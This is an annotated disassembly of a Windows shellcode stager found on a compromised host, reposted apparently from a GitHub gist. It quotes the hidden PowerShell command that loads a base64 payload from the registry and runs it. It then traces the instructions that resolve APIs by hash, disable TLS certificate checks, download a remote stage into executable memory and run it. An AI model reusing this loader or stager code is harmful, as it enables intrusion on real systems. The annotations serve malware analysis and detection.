; Shellcode found on a Windows host. The payload was stored in the registry; PowerShell
; was used to extract it from the registry and execute it:
; C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -windowstyle \
; hidden -c "$val = (gp HKLM:SOFTWARE\'਀਀').'਀਀'; \
; $d = [System.Text.Encoding]::Unicode.GetString([System.convert]::FromBase64String($val)); iex $d"

; The following references were used to help comment the shellcode
; https://github.com/rapid7/metasploit-framework/blob/master/external/source/shellcode/windows/x86/src/block/block_reverse_https_proxy.asm
; https://hiddencodes.wordpress.com/2014/11/11/api-hash-list-4/

    ; ---------------------------------------------------------------------
    ; Position-independent API resolver (matches the Metasploit "block_api"
    ; stub referenced above).  Callers push a 32-bit hash of
    ; "MODULE.DLL" + "FunctionName" and then `call ebp`; the stub walks the
    ; PEB loader list and each module's export table, re-hashing names with a
    ; ROR-13 scheme until it finds a match, then tail-jumps into the API so
    ; the API returns straight to the caller of `call ebp`.
    ; Clobbers: ecx, edx, flags (the hash argument is removed from the stack);
    ; the other GPRs are restored by popal, eax carries the resolved address.
    ; The constant hashes pushed throughout the blob are stable,
    ; signature-grade indicators for this stager family.
    ; ---------------------------------------------------------------------
    0x00080000:  cld     cld                              ; DF=0 so lodsb walks forward
    0x00080001:  call    0x8008f                          ; pushes 0x80006 (= api_call); `pop ebp` at 0x8008f keeps it in ebp
    ; api_call entry (0x80006).  On entry: [esp] = return address, [esp+4] = requested hash.
    0x00080006:  pushal  pushal   ; 60                    ; save all GPRs (0x20 bytes): [ebp+0x20] = ret addr, [ebp+0x24] = hash
    0x00080007:  mov     ebp, esp ; 89 e5                 ; ebp = frame base for the [ebp+/-x] references below
    0x00080009:  xor     edx, edx ; 31 d2
    0x0008000B:  mov     edx, dword ptr fs:[edx + 0x30]   ; edx = PEB (fs:[0x30])
    0x0008000F:  mov     edx, dword ptr [edx + 0xc]       ; edx = PEB->Ldr
    0x00080012:  mov     edx, dword ptr [edx + 0x14]      ; edx = Ldr->InMemoryOrderModuleList.Flink (first entry, at its InMemoryOrderLinks)
    ; next_mod (0x80015): offsets below are relative to InMemoryOrderLinks (LDR_DATA_TABLE_ENTRY + 8)
    0x00080015:  mov     esi, dword ptr [edx + 0x28]      ; esi = BaseDllName.Buffer (UTF-16 module name)
    0x00080018:  movzx   ecx, word ptr [edx + 0x26]       ; ecx = BaseDllName.MaximumLength (bytes to hash)
    0x0008001C:  xor     edi, edi                         ; edi = running module-name hash
    ; loop_modname (0x8001e): hash every byte of the name buffer, folding a-z to A-Z
    0x0008001E:  xor     eax, eax
    0x00080020:  lodsb   al, byte ptr [esi]               ; next byte of the UTF-16 name (high bytes of ASCII chars are 0)
    0x00080021:  cmp     al, 0x61                         ; below 'a'?
    0x00080023:  jl      0x80027                          ; signed compare: bytes >= 0x80 read as negative and skip the fold
    0x00080025:  sub     al, 0x20                         ; to uppercase
    0x00080027:  ror     edi, 0xd                         ; hash = ror13(hash) + byte
    0x0008002A:  add     edi, eax
    0x0008002C:  loop    0x8001e                          ; ecx--; repeat until MaximumLength bytes consumed
    0x0008002E:  push    edx                              ; [ebp-4] = current module entry
    0x0008002F:  push    edi                              ; [ebp-8] = module-name hash
    0x00080030:  mov     edx, dword ptr [edx + 0x10]      ; edx = DllBase
    0x00080033:  mov     eax, dword ptr [edx + 0x3c]      ; eax = e_lfanew
    0x00080036:  add     eax, edx                         ; eax = IMAGE_NT_HEADERS
    0x00080038:  mov     eax, dword ptr [eax + 0x78]      ; eax = DataDirectory[0].VirtualAddress (export table RVA)
    0x0008003B:  test    eax, eax
    0x0008003D:  je      0x80089                          ; no export table -> next module (skips the `pop eax` at 0x80088, nothing was pushed)
    0x0008003F:  add     eax, edx                         ; eax = IMAGE_EXPORT_DIRECTORY
    0x00080041:  push    eax                              ; keep the export directory pointer
    0x00080042:  mov     ecx, dword ptr [eax + 0x18]      ; ecx = NumberOfNames
    0x00080045:  mov     ebx, dword ptr [eax + 0x20]      ; ebx = AddressOfNames (RVA)
    0x00080048:  add     ebx, edx                         ; ebx = AddressOfNames (VA)
    ; get_next_func (0x8004a): walk the name table backwards
    0x0008004A:  jecxz   0x80088                          ; names exhausted -> pop export dir, next module
    0x0008004C:  dec     ecx
    0x0008004D:  mov     esi, dword ptr [ebx + ecx*4]     ; esi = RVA of name[ecx]
    0x00080050:  add     esi, edx                         ; esi = name string (VA)
    0x00080052:  xor     edi, edi                         ; edi = running function-name hash
    ; loop_funcname (0x80054): ROR-13 hash of the ASCII name, including the terminating NUL
    0x00080054:  xor     eax, eax
    0x00080056:  lodsb   al, byte ptr [esi]
    0x00080057:  ror     edi, 0xd
    0x0008005A:  add     edi, eax
    0x0008005C:  cmp     al, ah                           ; ah is 0 here, so this tests for the NUL terminator
    0x0008005E:  jne     0x80054
    0x00080060:  add     edi, dword ptr [ebp - 8]         ; edi = module hash + function hash
    0x00080063:  cmp     edi, dword ptr [ebp + 0x24]      ; == requested hash?
    0x00080066:  jne     0x8004a                          ; no -> next export name
    ; found (0x80068): name index ecx -> ordinal -> function address
    0x00080068:  pop     eax                              ; eax = IMAGE_EXPORT_DIRECTORY
    0x00080069:  mov     ebx, dword ptr [eax + 0x24]      ; AddressOfNameOrdinals (RVA)
    0x0008006C:  add     ebx, edx
    0x0008006E:  mov     cx, word ptr [ebx + ecx*2]       ; cx = ordinal of name[ecx]
    0x00080072:  mov     ebx, dword ptr [eax + 0x1c]      ; AddressOfFunctions (RVA)
    0x00080075:  add     ebx, edx
    0x00080077:  mov     eax, dword ptr [ebx + ecx*4]     ; eax = function RVA
    0x0008007A:  add     eax, edx                         ; eax = function VA
    0x0008007C:  mov     dword ptr [esp + 0x24], eax      ; overwrite the saved eax slot of the pushal frame ([ebp+0x1c]) so popal yields eax = API
    0x00080080:  pop     ebx    ; 5b                      ; discard module hash
    0x00080081:  pop     ebx    ; 5b                      ; discard module entry
    0x00080082:  popal   popal  ; 61                      ; restore GPRs; eax = resolved API address
    0x00080083:  pop     ecx    ; 59                      ; ecx = caller's return address
    0x00080084:  pop     edx    ; 5a                      ; drop the hash argument
    0x00080085:  push    ecx    ; 51                      ; put the return address back on top
    0x00080086:  jmp     eax    ; ff e0                   ; tail-jump into the API; its `ret` returns to the caller of `call ebp`
    ; get_next_mod1 (0x80088): this module had no matching export
    0x00080088:  pop     eax    ; 58                      ; discard export directory pointer
    0x00080089:  pop     edi                              ; (0x80089) discard module hash
    0x0008008A:  pop     edx                              ; edx = module entry
    0x0008008B:  mov     edx, dword ptr [edx]             ; edx = InMemoryOrderLinks.Flink (next module)
    0x0008008D:  jmp     0x80015                          ; no end-of-list check: an unresolvable hash never returns cleanly
    0x0008008F:  pop     ebp                              ; ebp = &api_call (0x80006), reached from the call at 0x80001

; load wininet
    ; LoadLibraryA("wininet"): the DLL name is assembled on the stack from two
    ; immediates so the blob carries no plaintext "wininet" string.
    0x00080090:  push    0x74656e            ; Push the bytes 'wininet',0 onto the stack. ("net\0")
    0x00080095:  push    0x696e6977          ; ... ("wini")
    0x0008009A:  push    esp                 ; Push a pointer to the "wininet" string on the stack.
    0x0008009B:  push    0x726774c           ; hash( "kernel32.dll", "LoadLibraryA" )
    0x000800A0:  call    ebp                 ; LoadLibraryA( "wininet" )
    0x000800A2:  call    0x80127             ; pushes 0x800a7 = address of the user-agent string below as the "return address"

; user agent string - Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; WOW64; Trident/6.0; ASU2JS)
;   (occupies 0x800a7..0x80126 and is not shown as instructions).  A fixed,
;   hard-coded User-Agent like this is a usable network indicator.

    ; INTERNETAPI_(HINTERNET) InternetOpenA(
    ;   LPCSTR lpszAgent,
    ;   DWORD  dwAccessType,
    ;   LPCSTR lpszProxy,
    ;   LPCSTR lpszProxyBypass,
    ;   DWORD  dwFlags);
    ; NOTE(review): the five bytes at 0x80127..0x8012b are missing from this
    ; listing.  Presumably `pop ecx` (ecx = user-agent pointer) plus the
    ; remaining zero/NULL argument pushes (dwFlags, lpszProxyBypass), which is
    ; consistent with only three pushes being visible before the hash below
    ; and with edi being used as NULL here -- confirm against the raw bytes.
    0x0008012C:  push    edi             ; lpszProxy (presumably NULL, see note)
    0x0008012D:  push    edi             ; dwAccessType (presumably 0 = INTERNET_OPEN_TYPE_PRECONFIG)
    0x0008012E:  push    ecx             ; lpszAgent (user-agent string)
    0x0008012F:  push    0xa779563a      ; hash( "wininet.dll", "InternetOpenA" )
    0x00080134:  call    ebp             ; eax = hInternet (not NULL-checked)

    0x00080136:  jmp     0x801ce         ; -> jmp 0x80219 -> call 0x8013b: enters InternetConnectA with the host string address pushed

    ; HINTERNET InternetConnectA(
    ;     HINTERNET     hInternet,
    ;     LPCSTR        lpszServerName,
    ;     INTERNET_PORT nServerPort,
    ;     LPCSTR        lpszUserName,
    ;     LPCSTR        lpszPassword,
    ;     DWORD         dwService,
    ;     DWORD         dwFlags,
    ;     DWORD_PTR     dwContext);
    ; Entered by `call 0x8013b` at 0x80219, which leaves the address of the
    ; NUL-terminated server hostname (the `url:` data at 0x8021e) on the
    ; stack.  eax = hInternet from InternetOpenA.
    0x0008013B:  pop     ebx             ; ebx = pointer to the server hostname string
    0x0008013C:  xor     ecx, ecx        ; NULL
    0x0008013E:  push    ecx             ; DWORD_PTR dwContext (NULL)
    0x0008013F:  push    ecx             ; dwFlags (0)
    0x00080140:  push    3               ; DWORD dwService (3 = INTERNET_SERVICE_HTTP)
    0x00080142:  push    ecx             ; lpszPassword (NULL)
    0x00080143:  push    ecx             ; lpszUserName (NULL)
    0x00080144:  push    0x1bb           ; nServerPort = 443 (TLS is requested via INTERNET_FLAG_SECURE in HttpOpenRequestA)
    0x00080149:  push    ebx             ; lpszServerName (hostname)
    0x0008014A:  push    eax             ; HINTERNET hInternet
    0x0008014B:  push    0xc69f8957      ; hash( "wininet.dll", "InternetConnectA" )
    0x00080150:  call    ebp             ; eax = hConnect (not NULL-checked)
    0x00080152:  mov     ebx, eax        ; save hConnect; reloaded at 0x801c6 for the proxy-auth retry

    0x00080154:  jmp     0x801d0         ; -> call 0x80156: pushes 0x801d5 (request-path string) and enters HttpOpenRequestA

    ; INTERNETAPI_(HINTERNET) HttpOpenRequestA(
    ;   HINTERNET hConnect,
    ;   LPCSTR    lpszVerb,
    ;   LPCSTR    lpszObjectName,
    ;   LPCSTR    lpszVersion,
    ;   LPCSTR    lpszReferrer,
    ;   LPCSTR    *lplpszAcceptTypes,
    ;   DWORD     dwFlags,
    ;   DWORD_PTR dwContext);
    ; Entered by `call 0x80156` at 0x801d0 (first pass and every proxy-auth
    ; retry); that call leaves the address of the request-path string
    ; (0x801d5, mis-decoded as instructions further down) on the stack.
    ; eax = hConnect.
    0x00080156:  pop     ecx             ; ecx = lpszObjectName (request path)
    0x00080157:  xor     edx, edx        ; NULL
    0x00080159:  push    edx             ; dwContext (NULL)
    0x0008015A:  push    0x84a03200      ; dwFlags = 0x80000000 | 0x04000000 | 0x00800000 | 0x00200000 | 0x00001000 | 0x00002000 | 0x00000200
                                         ;   0x80000000 |        ; INTERNET_FLAG_RELOAD
                                         ;   0x04000000 |        ; INTERNET_FLAG_NO_CACHE_WRITE
                                         ;   0x00800000 |        ; INTERNET_FLAG_SECURE (TLS)
                                         ;   0x00200000 |        ; INTERNET_FLAG_NO_AUTO_REDIRECT
                                         ;   0x00001000 |        ; INTERNET_FLAG_IGNORE_CERT_CN_INVALID
                                         ;   0x00002000 |        ; INTERNET_FLAG_IGNORE_CERT_DATE_INVALID
                                         ;   0x00000200          ; INTERNET_FLAG_NO_UI
                                         ; The two IGNORE_CERT_* bits disable name/date
                                         ; validation of the server certificate, so a
                                         ; TLS-inspecting proxy can decrypt this traffic.
    0x0008015F:  push    edx             ; lplpszAcceptTypes (NULL)
    0x00080160:  push    edx             ; lpszReferrer (NULL)
    0x00080161:  push    edx             ; lpszVersion (NULL)
    0x00080162:  push    ecx             ; lpszObjectName (request path)
    0x00080163:  push    edx             ; lpszVerb (NULL = GET)
    0x00080164:  push    eax             ; hConnect
    0x00080165:  push    0x3b2e55eb      ; hash( "wininet.dll", "HttpOpenRequestA" )
    0x0008016A:  call    ebp
    0x0008016C:  mov     esi, eax        ; esi = hRequest (not NULL-checked here; see the test at 0x80196)

    ; BOOLAPI InternetSetOptionA(
    ;   HINTERNET hInternet,
    ;   DWORD     dwOption,
    ;   LPVOID    lpBuffer,
    ;   DWORD     dwBufferLength);
    ; Turns off every server-certificate check on the request handle.  This is
    ; why the stager accepts self-signed / untrusted certificates from its
    ; server, and why the traffic can be decrypted at an inspecting proxy.
    0x0008016E:  push    0x3380          ; the DWORD dwFlags lives on the stack: 0x00002000 |        ; SECURITY_FLAG_IGNORE_CERT_DATE_INVALID
                                         ; 0x00001000 |        ; SECURITY_FLAG_IGNORE_CERT_CN_INVALID
                                         ; 0x00000200 |        ; SECURITY_FLAG_IGNORE_WRONG_USAGE
                                         ; 0x00000100 |        ; SECURITY_FLAG_IGNORE_UNKNOWN_CA
                                         ; 0x00000080          ; SECURITY_FLAG_IGNORE_REVOCATION
    0x00080173:  mov     eax, esp        ; eax = &dwFlags (the dword just pushed)

    0x00080175:  push    4               ; dwBufferLength = sizeof(DWORD)
    0x00080177:  push    eax             ; lpBuffer = &dwFlags
    0x00080178:  push    0x1f            ; dwOption (31 = INTERNET_OPTION_SECURITY_FLAGS)
    0x0008017A:  push    esi             ; hInternet = hRequest
    0x0008017B:  push    0x869e4675      ; hash( "wininet.dll", "InternetSetOptionA" )
    0x00080180:  call    ebp             ; return value ignored; the 0x3380 dword is left on the stack

    ; BOOLAPI HttpSendRequestA(
    ;   HINTERNET hRequest,
    ;   LPCSTR    lpszHeaders,
    ;   DWORD     dwHeadersLength,
    ;   LPVOID    lpOptional,
    ;   DWORD     dwOptionalLength);
    0x00080182:  xor     edi, edi        ; NULL
    0x00080184:  push    edi             ; dwOptionalLength (0)
    0x00080185:  push    edi             ; lpOptional (NULL)
    0x00080186:  push    edi             ; dwHeadersLength (0)
    0x00080187:  push    edi             ; lpszHeaders (NULL)
    0x00080188:  push    esi             ; hRequest
    0x00080189:  push    0x7b18062d      ; hash( "wininet.dll", "HttpSendRequestA" )
    0x0008018E:  call    ebp             ; GET <path> over TLS, no body, no extra headers
    0x00080190:  test    eax, eax        ; FALSE -> failure
    0x00080192:  je      0x801dc         ; -> exit stub hidden in the mis-decoded bytes at 0x801db (see below)

    ; Proxy-auth / retry handling (the "_proxy" variant of the Metasploit
    ; stager referenced above).  InternetErrorDlg is asked to examine the
    ; response and, if needed, obtain credentials/options; when it returns
    ; ERROR_INTERNET_FORCE_RETRY (0x2f00 = 12032) the request is re-opened and
    ; re-sent from 0x80156, otherwise execution continues to the stage
    ; download at 0x801e3.
    0x00080194:  xor     edi, edi
    0x00080196:  test    esi, esi        ; hRequest == NULL?
    0x00080198:  je      0x8019e         ; yes -> use GetLastError() as dwError
    0x0008019A:  mov     ecx, edi        ; dwError = 0
    0x0008019C:  jmp     0x801a7
    0x0008019E:  push    0x5de2c5aa     ; hash( "kernel32.dll", "GetLastError" )
    0x000801A3:  call    ebp
    0x000801A5:  mov     ecx, eax        ; dwError = GetLastError()
    0x000801A7:  push    0x315e2145     ; GetDesktopWindow (presumably hash( "user32.dll", "GetDesktopWindow" ) per the referenced source)
    0x000801AC:  call    ebp             ; eax = desktop HWND, used as the dialog owner
    0x000801AE:  xor     edi, edi
    0x000801B0:  push    edi             ; lppvData (NULL)
    0x000801B1:  push    7               ; dwFlags = 1|2|4 = FLAGS_ERROR_UI_FILTER_FOR_ERRORS | FLAGS_ERROR_UI_FLAGS_CHANGE_OPTIONS | FLAGS_ERROR_UI_FLAGS_GENERATE_DATA
    0x000801B3:  push    ecx             ; dwError
    0x000801B4:  push    esi             ; hRequest
    0x000801B5:  push    eax             ; hWnd
    0x000801B6:  push    0xbe057b7      ; InternetErrorDlg (wininet.dll)
    0x000801BB:  call    ebp
    0x000801BD:  mov     edi, 0x2f00     ; ERROR_INTERNET_FORCE_RETRY (12032)
    0x000801C2:  cmp     edi, eax
    0x000801C4:  jne     0x801ca         ; any other result -> download the stage
    0x000801C6:  mov     eax, ebx        ; eax = saved hConnect
    0x000801C8:  jmp     0x80154         ; -> jmp 0x801d0 -> call 0x80156: redo HttpOpenRequestA..HttpSendRequestA (previous hRequest is leaked)
    0x000801CA:  xor     edi, edi        ; edi = NULL (lpAddress for VirtualAlloc)
    0x000801CC:  jmp     0x801e3         ; -> stage download
    0x000801CE:  jmp     0x80219         ; trampoline from 0x80136: -> call 0x8013b (InternetConnectA)
    0x000801D0:  call    0x80156         ; trampoline from 0x80154/0x801c8: pushes 0x801d5 (request-path string) and enters HttpOpenRequestA
    ; 0x801d5..0x801db are DATA -- the NUL-terminated request path that
    ; `pop ecx` at 0x80156 picks up -- mis-decoded by the disassembler as the
    ; instructions below.  Reading the shown encodings back: 2f 53 66 6f 34 00
    ; = "/Sfo4\0" (confirm against the raw bytes), followed by
    ; 00 68 f0 b5 a2 56 ff d5.
    0x000801D5:  das     das             ; 2f  '/'
    0x000801D6:  push    ebx             ; 53  'S'
    0x000801D7:  outsw   dx, word ptr [esi]   ; 66 6f  'fo'
    0x000801D9:  xor     al, 0           ; 34 00  '4', NUL
    0x000801DB:  add     byte ptr [eax - 0x10], ch   ; 00 68 f0 -- the real branch target 0x801dc starts at the 68 byte:
                                         ;   68 f0 b5 a2 56 = push 0x56a2b5f0, which in the referenced Metasploit
                                         ;   source is hash( "kernel32.dll", "ExitProcess" ); both `je 0x801dc` sites land here
    0x000801DE:  mov     ch, 0xa2        ; b5 a2  (tail of that push immediate)
    0x000801E0:  push    esi             ; 56     (tail of that push immediate)
    0x000801E1:  call    ebp             ; ff d5  -> ExitProcess(): the stager exits silently on any failure

    ; Stage download: allocate one RWX region, read the HTTP body into it in
    ; 0x2000-byte chunks, then `ret` into it.  An RWX VirtualAlloc followed
    ; by InternetReadFile into the same buffer is the classic stager pattern
    ; and a good behavioural detection hook.
    0x000801E3:  push    0x40          ; flProtect = PAGE_EXECUTE_READWRITE (RWX)
    0x000801E5:  push    0x1000        ; flAllocationType = MEM_COMMIT
    0x000801EA:  push    0x400000      ; dwSize = 0x400000 = 4 MiB stage buffer (the Metasploit source comment says "8Mb"; the value is 4 MiB)
    0x000801EF:  push    edi           ; lpAddress = NULL
    0x000801F0:  push    0xe553a458    ; hash( "kernel32.dll", "VirtualAlloc" )
    0x000801F5:  call    ebp           ; VirtualAlloc( NULL, 0x400000, MEM_COMMIT, PAGE_EXECUTE_READWRITE ); NULL return not checked
    0x000801F7:  xchg    eax, ebx      ; ebx = buffer (write cursor); the old hConnect in eax is now dead
    0x000801F8:  push    ebx           ; [esp+4] = stage base, consumed by the final `ret`
    0x000801F9:  push    ebx           ; [esp]   = scratch dword reused as bytesRead
    0x000801FA:  mov     edi, esp      ; edi = &bytesRead
    ; read_more (0x801fc)
    0x000801FC:  push    edi           ; lpdwNumberOfBytesRead = &bytesRead
    0x000801FD:  push    0x2000        ; dwNumberOfBytesToRead = 8 KiB per call
    0x00080202:  push    ebx           ; lpBuffer = current write cursor
    0x00080203:  push    esi           ; hFile = hRequest
    0x00080204:  push    0xe2899612    ; hash( "wininet.dll", "InternetReadFile" )
    0x00080209:  call    ebp
    0x0008020B:  test    eax, eax      ; FALSE -> read error
    0x0008020D:  je      0x801dc       ; -> exit stub (push ExitProcess hash / call ebp) hidden inside the mis-decoded bytes at 0x801db
    0x0008020F:  mov     eax, dword ptr [edi]   ; eax = bytesRead
    0x00080211:  add     ebx, eax      ; cursor += bytesRead (nothing checks that the cursor stays inside the 0x400000-byte allocation)
    0x00080213:  test    eax, eax      ; 0 bytes read = end of body
    0x00080215:  jne     0x801fc       ; otherwise fetch the next chunk
    0x00080217:  pop     eax           ; discard the bytesRead scratch dword
    0x00080218:  ret     ret           ; pops the stage base into eip: executes the downloaded stage in the RWX buffer
    0x00080219:  call    0x8013b       ; trampoline (from 0x801ce): pushes 0x8021e, the address of the host string at url:, and enters InternetConnectA

url:
	; 0x0008021E: 61  -- first byte of the NUL-terminated server hostname consumed by `pop ebx` at 0x8013b
	; url foobar.com  -- NOTE(review): 0x61 is 'a', not 'f'; the hostname shown here looks like an analyst placeholder, confirm against the raw bytes

 

출처 : https://gist.github.com/jdferrell3/4db966da06f4fa77816a54d802aca0f8 
